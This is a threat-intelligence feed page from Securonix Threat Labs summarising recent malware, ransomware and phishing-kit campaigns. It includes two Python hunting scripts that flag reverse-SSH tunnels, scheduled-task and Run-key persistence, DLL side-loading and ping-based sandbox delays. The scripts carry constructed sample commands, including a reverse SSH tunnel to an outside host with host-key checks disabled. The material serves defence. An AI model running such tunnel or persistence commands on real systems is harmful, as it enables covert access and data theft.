Securonix Threat Labs

Get up-to-date threat content from the experts at Securonix Threat Labs.

Uncover the threats of tomorrow, today.

Securonix Threat Labs helps your team fend off rising threats by bringing the industry’s brightest minds together to equip you with the latest countermeasures and best practices.


Powered by Threat Labs

Autonomous Threat Sweeper

Acting as your own dedicated Cyber Rapid Response Team, Securonix Autonomous Threat Sweeper (ATS) automatically and retroactively hunts for new and emerging threats based on the latest threat intelligence from our Threat Labs Team.

Latest ATS Entries

All indicators of compromise (IOC) and search queries are available on our GitHub repository.

2025-11-09
Operation_Silk_Lure_Scheduled_Tasks_Weaponized
LOW
Intel Source:
Seqrite
Intel Name:
Operation_Silk_Lure_Scheduled_Tasks_Weaponized
Date of Scan:
2025-11-09
Impact:
LOW
Summary:
Researchers at Seqrite found a cyber-espionage campaign in which attackers sent fake Chinese-language résumés to HR teams. When the résumé is opened, it installs malware by creating a Windows scheduled task that launches a legitimate executable, which in turn side-loads a hidden malicious DLL. The final payload, ValleyRAT, steals data, monitors the host, and communicates with command-and-control servers located in Hong Kong. The campaign primarily targets staff at cryptocurrency trading and financial technology companies.
Source: https://www.seqrite.com/blog/operation-silk-lure-scheduled-tasks-weaponized-for-dll-side-loading-drops-valleyrat/
2025-11-09
CHAMELEON_NET_Spreads_FormBook_via_DarkTortilla
HIGH
Intel Source:
Securonix Threat Research
Intel Name:
CHAMELEON_NET_Spreads_FormBook_via_DarkTortilla
Date of Scan:
2025-11-09
Impact:
HIGH
Summary:
Researchers at Securonix Threat Research have identified CHAMELEON#NET, a multi-stage malspam campaign that delivers the FormBook RAT through a DarkTortilla loader. Phishing emails impersonating national social security institutions lure victims to a fake webmail portal, where they download an archive (81__POP1.BZ2) containing a heavily obfuscated JavaScript dropper (POP2.js). The dropper spawns Base64-encoded payloads (adobe.js, svchost.js) that install a VB.NET loader (QNaZg.exe), a DarkTortilla variant that decrypts an embedded DLL with a custom XOR cipher and reflectively loads it in memory via AppDomain.Load(byte[]) so the payload never touches disk. The decrypted Segwenservice.dll is FormBook, configured through AES-encrypted resources that control persistence, anti-VM checks, and credential theft. It persists via registry Run keys and AppData startup implants while masquerading as word.exe, disables Windows Defender, logs keystrokes, and exfiltrates data to a DuckDNS-hosted C2. The chain as a whole relies on fileless reflective loading, multi-layer obfuscation, and time-based sandbox evasion using ping delays.
Source: https://www.securonix.com/blog/chameleonnet-a-deep-dive-into-multi-stage-net-malware-leveraging-reflective-loading-and-custom-decryption-for-stealthy-operations/
2025-11-09
DragonForce_Rebrands_as_Expanding_Ransomware_Cartel
HIGH
Intel Source:
Acronis
Intel Name:
DragonForce_Rebrands_as_Expanding_Ransomware_Cartel
Date of Scan:
2025-11-09
Impact:
HIGH
Summary:
Researchers at Acronis Threat Research Unit have identified that DragonForce, a Conti-derived ransomware-as-a-service (RaaS) operation active since 2023, has rebranded into a full-fledged ransomware cartel, enabling affiliates to white-label its encryptor and release variants such as Devman and Mamona/Global. The group employs BYOVD attacks using vulnerable kernel drivers (truesight.sys, rentdrv2.sys) to disable security tools prior to encryption and shares code lineage with LockBit Green via Conti v3 leaks. DragonForce’s affiliate program offers 80% profit shares and infrastructure access, and its alliance with Scattered Spider, a group specializing in SIM-swapping, MFA bypass, and vishing, provides initial access and data exfiltration via AnyDesk, ScreenConnect, and cloud platforms like MEGA or Amazon S3. Since late 2023, DragonForce affiliates have exposed over 200 enterprise victims across industries including retail, airlines, MSPs, and insurance, with the Marks & Spencer breach notably linked to the DragonForce–Scattered Spider partnership. Rebuilt using MinGW from Conti’s leaked source, the malware encrypts Windows, Linux, and ESXi systems with ChaCha20 and RSA-wrapped keys, referencing configuration files for process-kill lists (MsMpEng.exe, sql.exe) and whitelisted paths.
Source: https://www.acronis.com/en/tru/posts/the-dragonforce-cartel-scattered-spider-at-the-gate/
2025-11-08
Cephalus_Ransomware_Fake_Key_Evasion
HIGH
Intel Source:
ASEC
Intel Name:
Cephalus_Ransomware_Fake_Key_Evasion
Date of Scan:
2025-11-08
Impact:
HIGH
Summary:
Researchers at AhnLab Security Emergency Response Center (ASEC) have identified a new ransomware group named Cephalus, first observed in June 2025 and motivated solely by financial gain. The group primarily breaches organizations by stealing credentials for Remote Desktop Protocol (RDP) accounts that lack multi-factor authentication (MFA). Once inside, Cephalus exfiltrates sensitive data and encrypts systems to pressure victims into payment. The ransomware, written in Go, employs evasion mechanisms such as generating fake AES keys to mislead analysts and using AES-CTR mode to minimize how long the real key is exposed on disk and in memory. Cephalus disables Windows Defender's protections, deletes Volume Shadow Copies, and terminates Veeam backup and MSSQL services so that the encrypted data cannot be recovered. Its SecureMemory routines, including memory locking and XOR-based key masking, further protect its encryption keys from forensic recovery.
Source: https://asec.ahnlab.com/en/90878/
2025-11-08
Windows_SSH_backdoor
MEDIUM
Intel Source:
PRODAFT (via X/Twitter)
Intel Name:
Windows_SSH_backdoor
Date of Scan:
2025-11-08
Impact:
MEDIUM
Summary:
PRODAFT researchers have identified that the FIN7 threat group, also known as Savage Ladybug, is actively deploying a Windows-based SSH backdoor to maintain persistent access and exfiltrate data from enterprise systems. The campaign uses legitimate OpenSSH components together with a batch script that automates deployment and establishes covert channels between compromised hosts and attacker-controlled servers. Because the backdoor speaks standard SSH, the encrypted reverse SSH and SFTP connections it establishes blend with legitimate administrative traffic, making detection difficult. The backdoor provides persistent remote access, lateral movement, and data theft while leaving minimal forensic traces in security logs.
Source: https://x.com/PRODAFT/status/1985731361492050255
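The entry above describes a backdoor built from stock OpenSSH plus a batch script, so the hunting signal is not a malicious binary but the way a legitimate ssh.exe is invoked. The following added example (written for this page, not PRODAFT's or Securonix's own content) parses ssh client command lines the way OpenSSH's option parser does, pulls out the indicators a defender cares about (a -R reverse forward, -N tunnel-only sessions, host-key checking disabled, an identity key under a user-writable directory) and scores each line. The batch file, the ProgramData path and the 203.0.113.10 host are constructed sample data, not indicators from the report.

```python
import re

# One token per quoted string or run of non-whitespace; good enough for batch-style command lines.
TOKEN = re.compile(r'"[^"]*"|\S+')
SSH_IMAGE = re.compile(r"(^|\\)ssh(\.exe)?$", re.I)
USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Temp|Users\\Public)\\", re.I)
# ssh(1) options that consume an argument (from the OpenSSH client manual). Everything else is boolean.
OPTS_WITH_ARG = set("bBcDEeFIiJLlmOopQRSWw")


def parse_ssh(cmdline):
    """Return the tunnel-relevant parts of an ssh invocation, or None if this is not ssh at all."""
    toks = [t.strip('"') for t in TOKEN.findall(cmdline)]
    if not toks or not SSH_IMAGE.search(toks[0]):
        return None
    info = {"remote_forwards": [], "no_shell": False, "identity": None,
            "options": [], "target": None}
    i = 1
    while i < len(toks):
        t = toks[i]
        i += 1
        if not t.startswith("-") or len(t) < 2:
            if info["target"] is None:
                info["target"] = t          # first bare word is [user@]host; the rest is a remote command
            continue
        flag = t[1]
        if flag in OPTS_WITH_ARG:
            # OpenSSH accepts both "-R 2222:h:22" and "-R2222:h:22"
            if len(t) > 2:
                arg = t[2:]
            elif i < len(toks):
                arg, i = toks[i], i + 1
            else:
                arg = ""
            if flag == "R":
                info["remote_forwards"].append(arg)
            elif flag == "i":
                info["identity"] = arg
            elif flag == "o":
                info["options"].append(arg)
        elif "N" in t[1:]:
            info["no_shell"] = True         # boolean flags may be bundled, e.g. -qN
    return info


def classify(info):
    """List the reasons an invocation looks like a reverse-tunnel backdoor rather than admin use."""
    reasons = []
    if info["remote_forwards"]:
        reasons.append("reverse tunnel (-R): " + ", ".join(info["remote_forwards"]))
    if info["no_shell"]:
        reasons.append("no remote command (-N): tunnel-only session")
    if any(o.replace(" ", "").lower() == "stricthostkeychecking=no" for o in info["options"]):
        reasons.append("host-key checking disabled (-o StrictHostKeyChecking=no)")
    if info["identity"] and USER_WRITABLE.search(info["identity"]):
        reasons.append("identity key stored under a user-writable path: " + info["identity"])
    return reasons


def scan_batch(text):
    """Run every line of a batch script through parse_ssh/classify; return [(line, reasons), ...]."""
    findings = []
    for line in text.splitlines():
        info = parse_ssh(line.strip())
        if info:
            reasons = classify(info)
            if reasons:
                findings.append((line.strip(), reasons))
    return findings


# Constructed sample batch script (not from the report) modelled on the deployment described above.
SAMPLE_BATCH = r'''@echo off
rem constructed sample: re-establish the reverse tunnel every minute
:loop
"C:\ProgramData\ssh\ssh.exe" -o StrictHostKeyChecking=no -i C:\ProgramData\ssh\id_rsa -qN -R 2222:127.0.0.1:22 tunnel@203.0.113.10
timeout /t 60 >nul
goto loop
'''
# A benign administrator session with a local (-L) forward, for contrast.
BENIGN_ADMIN = r'ssh.exe -p 22 -L 8080:intranet:80 admin@10.0.0.5'

if __name__ == "__main__":
    for line, reasons in scan_batch(SAMPLE_BATCH):
        print(line)
        for r in reasons:
            print("  -", r)
    print("benign admin line reasons:", classify(parse_ssh(BENIGN_ADMIN)))
```

Feeding real Sysmon process-creation command lines (or the contents of scheduled-task actions) through scan_batch gives the same triage; the -R plus -N combination is the strongest single signal, since an interactive administrator almost never needs a tunnel-only reverse forward.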
2025-11-07
Rhadamanthys_Malware
LOW
Intel Source:
ASEC
Intel Name:
Rhadamanthys_Malware
Date of Scan:
2025-11-07
Impact:
LOW
Summary:
Researchers at AhnLab Security Intelligence Center (ASEC) identified a new distribution method for the Rhadamanthys infostealer, a well-known malware family that steals credentials, cryptocurrency wallets, browser data, and system information. In this campaign, threat actors disguise Rhadamanthys as a visual novel game built with Ren’Py, a Python-based open-source engine used by indie developers whose titles are sold on platforms such as Steam. The attackers embed the malware in the game’s script files, so when users run what appears to be a harmless game executable, the malicious loader activates and installs Rhadamanthys in the background. The campaign relies on social engineering within gaming communities, especially free game forums and file-sharing sites like MediaFire, to infect unsuspecting users.
Source: https://asec.ahnlab.com/en/90767/
2025-11-07
Kimsuky_JavaScript_Dropper_Analysis
HIGH
Intel Source:
Pulsedive
Intel Name:
Kimsuky_JavaScript_Dropper_Analysis
Date of Scan:
2025-11-07
Impact:
HIGH
Summary:
Researchers at Pulsedive Threat Research have identified a new Kimsuky intrusion chain that uses a JavaScript-based dropper to establish persistence and exfiltrate system information from Windows hosts. The dropper runs in multiple stages, beginning with a lightweight JavaScript file that retrieves and executes additional payloads from adversary infrastructure. The next stage performs host reconnaissance, collecting system configuration details, running processes, and directory listings, which are compressed and sent to the attacker’s command server. The malware also modifies Windows registry keys and creates scheduled tasks so that the dropper keeps running after a reboot.
Source: https://blog.pulsedive.com/dissecting-the-infection-chain-technical-analysis-of-the-kimsuky-javascript-dropper/
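Three of the entries above (Operation Silk Lure, CHAMELEON#NET and this Kimsuky chain) persist and evade in the same handful of ways: a scheduled task or Run key pointing at a binary in a user-writable directory, a DLL side-loaded from next to its host executable, and ping used as a sleep to outlast sandboxes. The following added example (written for this page, not from any of the cited researchers or from Securonix's repository) encodes those behaviours as rules over Sysmon-style events and runs them over a constructed set of sample records. The event field names follow Sysmon (EventID 1 process create, 7 image load, 13 registry value set); the paths, task names and registry values are invented for the example, not indicators from the reports.

```python
import re

# Windows paths are case-insensitive, so every pattern is compiled with re.I.
USER_WRITABLE = re.compile(r"\\(AppData|Users\\Public|ProgramData|Temp)\\", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\", re.I)
PING_SLEEP = re.compile(r"\bping(?:\.exe)?\s+-n\s+(\d+)", re.I)


def schtasks_from_user_path(ev):
    """EID 1: schtasks.exe /create whose /tr target lives in a user-writable directory."""
    if ev.get("EventID") != 1 or not ev.get("Image", "").lower().endswith("schtasks.exe"):
        return None
    cl = ev.get("CommandLine", "")
    if "/create" in cl.lower() and USER_WRITABLE.search(cl):
        return "scheduled task launches a binary from a user-writable path"
    return None


def run_key_to_user_path(ev):
    """EID 13: a Run/RunOnce value whose data points into a user-writable directory."""
    if ev.get("EventID") != 13 or not RUN_KEY.search(ev.get("TargetObject", "")):
        return None
    if USER_WRITABLE.search(ev.get("Details", "")):
        return "Run key autostart points at a user-writable path"
    return None


def dll_sideload_candidate(ev):
    """EID 7: an unsigned DLL loaded from the same user-writable directory as the host process."""
    if ev.get("EventID") != 7:
        return None
    image, loaded = ev.get("Image", ""), ev.get("ImageLoaded", "")
    same_dir = image.rsplit("\\", 1)[0].lower() == loaded.rsplit("\\", 1)[0].lower()
    if same_dir and USER_WRITABLE.search(loaded) and ev.get("Signed", "").lower() == "false":
        return "unsigned DLL loaded beside its host from a user-writable path (side-loading)"
    return None


def ping_delay(ev, min_count=30):
    """EID 1: ping -n <large count> used as a sleep primitive (time-based sandbox evasion)."""
    if ev.get("EventID") != 1:
        return None
    m = PING_SLEEP.search(ev.get("CommandLine", ""))
    if m and int(m.group(1)) >= min_count:
        return f"ping used as sleep ({m.group(1)} echo requests)"
    return None


RULES = (schtasks_from_user_path, run_key_to_user_path, dll_sideload_candidate, ping_delay)


def hunt(events):
    """Return [(rule_name, finding, event), ...] for every event that trips a rule."""
    hits = []
    for ev in events:
        for rule in RULES:
            finding = rule(ev)
            if finding:
                hits.append((rule.__name__, finding, ev))
    return hits


# Constructed sample telemetry: four suspicious records, each paired with a benign look-alike.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 5 /tn "Update" /tr "C:\Users\hr\AppData\Roaming\update\svc.exe"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc daily /tn "Backup" /tr "C:\Program Files\Backup\backup.exe"'},
    {"EventID": 13, "Image": r"C:\Users\hr\AppData\Roaming\word.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\word",
     "Details": r"C:\Users\hr\AppData\Roaming\word.exe"},
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "Details": r"C:\Program Files\Vendor\agent.exe"},
    {"EventID": 7, "Image": r"C:\Users\hr\AppData\Local\Temp\legit_signed.exe",
     "ImageLoaded": r"C:\Users\hr\AppData\Local\Temp\version.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true"},
    {"EventID": 1, "Image": r"C:\Windows\System32\PING.EXE", "CommandLine": "ping -n 60 127.0.0.1"},
    {"EventID": 1, "Image": r"C:\Windows\System32\PING.EXE", "CommandLine": "ping -n 3 8.8.8.8"},
]

if __name__ == "__main__":
    for name, finding, ev in hunt(SAMPLE_EVENTS):
        print(f"[{name}] {finding}: {ev.get('CommandLine') or ev.get('Details') or ev.get('ImageLoaded')}")
```

Each rule is deliberately narrow; the side-loading heuristic in particular needs the signature field (Sysmon's Signed) to keep noise down, and a production version would add an allow-list for software that legitimately self-updates from AppData.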
2025-11-07
Beast_Ransomware_Hidden_in_GUI
LOW
Intel Source:
ASEC
Intel Name:
Beast_Ransomware_Hidden_in_GUI
Date of Scan:
2025-11-07
Impact:
LOW
Summary:
Researchers at AhnLab Security Intelligence Center (ASEC) analyzed a newly emerging ransomware group called Beast, which evolved from the Monster ransomware family. The Beast group began operating as a Ransomware-as-a-Service (RaaS) in February 2025 and launched its Tor-based leak site (“Beast Leaks”) in July 2025. As of August 2025, it had publicly named 16 victims across North America, Europe, Asia, and Latin America, in sectors including manufacturing, construction, healthcare, education, and business services. Beast ransomware stands out for its technical sophistication, interactive GUI, and anti-recovery mechanisms, which make decryption practically impossible without the attackers’ key.
Source: https://asec.ahnlab.com/en/90792/
2025-11-06
ActiveMQ_Vulnerability_Exploitation_to_Install_Sharpire
LOW
Intel Source:
AhnLab Security Intelligence Center (ASEC)
Intel Name:
ActiveMQ_Vulnerability_Exploitation_to_Install_Sharpire
Date of Scan:
2025-11-06
Impact:
LOW
Summary:
Researchers at ASEC discovered that the Kinsing (also known as H2Miner) threat actor is exploiting the Apache ActiveMQ vulnerability CVE-2023-46604 to infect both Linux and Windows systems. The attackers use the flaw to remotely install several malware families, including XMRig (cryptominer), Sharpire (.NET backdoor), Cobalt Strike, and Meterpreter, for system control and post-exploitation. This marks a shift in Kinsing’s activity from simple cryptocurrency mining to full system compromise and remote control, making it a more serious and versatile threat.
Source: https://asec.ahnlab.com/en/90811/
2025-11-06
Tycoon_2FA_Bypasses_MFA_via_AiTM_Phishing_Kit
HIGH
Intel Source:
Cybereason
Intel Name:
Tycoon_2FA_Bypasses_MFA_via_AiTM_Phishing_Kit
Date of Scan:
2025-11-06
Impact:
HIGH
Summary:
Researchers at Cybereason have identified Tycoon 2FA, a Phishing-as-a-Service (PhaaS) kit active since August 2023 that uses a reverse-proxy Adversary-in-the-Middle (AiTM) technique to bypass MFA/2FA on Microsoft 365 and Google (Gmail) accounts: the proxy intercepts credentials and session cookies in real time, which is enough for full account takeover even when the victim completes MFA. The kit delivers phishing links via PDFs, PowerPoint and SVG files, and malicious websites often hosted on cloud platforms (Amazon S3, Dropbox, Canva), and performs domain, CAPTCHA, debugger, and bot checks before redirecting, so that automated analysis never reaches the phishing page. Its multi-stage JavaScript chain combines base64, XOR, and AES-encrypted code with CryptoJS-driven dynamic decryption, heavy obfuscation, and memory-only execution. The kit gathers user-agent and geolocation data, encrypts it with hard-coded AES keys, and sends it via AJAX POST requests to attacker-controlled C2 endpoints. The AiTM proxy relays credentials to the legitimate servers while dynamically rendering authentic error messages and MFA prompts, making the phishing flow nearly indistinguishable from a real login, and its adaptive design tailors each attack to the victim’s authentication policy.
Source: https://www.cybereason.com/blog/tycoon-phishing-kit-analysis

Threat Content

Shared Security Content on Sigma

Securonix Threat Labs publishes up-to-date IOCs and threat hunting queries in the Sigma detection-rule format on GitHub, allowing you to tap into a vast community of collective defense and stay ahead of emerging threat research.

Why Security Content Matters

Learn how Securonix is paving the way to make precise and actionable security content a reality for our customers.